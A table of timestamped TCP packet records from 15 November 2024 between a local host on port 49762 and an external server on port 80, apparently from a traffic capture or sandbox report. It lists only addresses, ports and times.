Nov 15, 2024 10:28:59.810024977 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.810051918 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.815041065 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815099001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815116882 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815167904 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.815167904 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.815210104 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815222025 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815233946 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815246105 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815251112 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815289974 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.815289974 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.815429926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815465927 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815558910 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.815931082 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815942049 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815953016 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.815992117 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.816030979 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.816041946 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.816052914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.816055059 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.816092968 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.818928957 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.818945885 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.818958044 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.819047928 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.819047928 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.821190119 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.821270943 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.821289062 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.821302891 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.821312904 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.821335077 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.821346998 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.821357965 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.821367979 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.821381092 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.821384907 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.821384907 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.821422100 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.821422100 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.825880051 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.825891972 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.825946093 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.825956106 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.826026917 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.826026917 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.827979088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.828032017 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.828042984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.828074932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.828094006 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.828108072 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.828108072 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.828119993 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.828145981 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.828346014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.828411102 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.828422070 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.828453064 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.830754042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.830766916 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.830776930 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.830856085 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.830856085 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.833417892 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.833451033 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.833460093 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.833465099 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.833534956 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.836080074 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.836134911 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.836144924 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.836214066 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.836224079 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.836236954 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.836281061 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.836322069 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.836332083 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.836369038 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.837666035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.837685108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.837737083 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.837793112 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.837816954 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.837877989 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.841985941 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.842011929 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.842021942 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.842083931 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.842488050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.842525005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.842539072 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.842580080 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.842603922 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.842628956 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.842633009 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.842715025 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.842751980 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.842762947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.842816114 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.842816114 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.846085072 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.846123934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.846148014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.846160889 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.846174955 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.846187115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.846203089 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.846256018 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.846256018 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.849102974 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.849164009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.849433899 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.853581905 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.853885889 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.853902102 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.854058027 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.877897024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.877926111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.877938032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.877950907 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.877978086 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.877989054 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.877999067 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878010988 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878032923 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.878098965 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878112078 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878114939 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.878142118 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.878145933 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878159046 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878196001 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.878341913 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878353119 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878365993 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878395081 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.878418922 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878431082 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878441095 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878452063 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878468990 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.878468990 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.878494024 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.878504992 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878515959 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878526926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.878554106 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.880579948 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.880625010 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.880641937 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.880652905 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.880666018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.880693913 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.880747080 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.886044979 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.886075020 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.886085987 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.886199951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.888000011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.888065100 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.888118982 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.888150930 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.888246059 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.888258934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.888272047 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.888288021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.888298035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.888318062 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.888371944 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.896459103 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.896491051 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.896500111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.896564007 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.896574974 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.896586895 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.896586895 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.896600008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.896653891 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.896653891 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.896858931 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.896898985 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.896908998 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.896967888 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.897044897 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.897057056 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.897068977 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.897083998 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.897100925 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.897166967 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.897675037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.897686005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.897696018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.897746086 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.897746086 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.900820017 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.901017904 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.901170969 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.904432058 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.904473066 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.904483080 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.904551029 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.907814026 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.907824039 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.907895088 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.907933950 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.907963991 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.908044100 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.923687935 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.923710108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.923722029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.923772097 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.923789024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.923803091 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.923861980 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.923873901 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.923921108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.923933983 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.923964024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.923979044 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.924041986 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.924185038 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924196959 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924209118 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924226046 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924237013 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924238920 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.924248934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924303055 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.924303055 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.924580097 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924633980 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924643993 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924683094 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.924696922 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924844980 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924890995 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.924907923 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924920082 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924942017 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.924981117 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.924981117 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.925169945 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.925182104 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.925193071 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.925231934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.925245047 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.925246954 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.925286055 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.925537109 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.925549030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.925566912 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.925590038 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.925612926 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.926713943 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.926744938 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.926836967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.926846981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.926961899 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.931972027 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.931986094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.931998968 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.932015896 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.932027102 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.932043076 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.932054043 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.932055950 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.932055950 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.932060003 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.932130098 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.933212996 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.933224916 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.933234930 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.933296919 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.933342934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.933355093 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.933367014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.933377981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.933387995 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.933418989 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.933446884 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.935704947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.935774088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.935784101 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.936171055 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.937995911 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.938007116 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.938030005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.938060045 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.938074112 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.938121080 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.938133001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.938261032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.938307047 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.938308001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.938322067 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.938334942 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.938345909 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.938389063 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.938404083 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.943044901 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.943058014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.943072081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.943114996 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.943273067 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.944976091 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.945034981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.945045948 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.945086956 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.945091009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.945103884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.945163012 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.945173979 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.945184946 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.945202112 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.945214033 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.945214987 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.945214987 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.945259094 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.945259094 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.947715044 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.947727919 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.947746038 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.948046923 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.950323105 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.950357914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.950414896 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.950431108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.950485945 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.950505018 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.953085899 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.953145981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.953174114 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.953326941 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.953380108 CET	80	49762	150.241.95.163	192.168.2.10
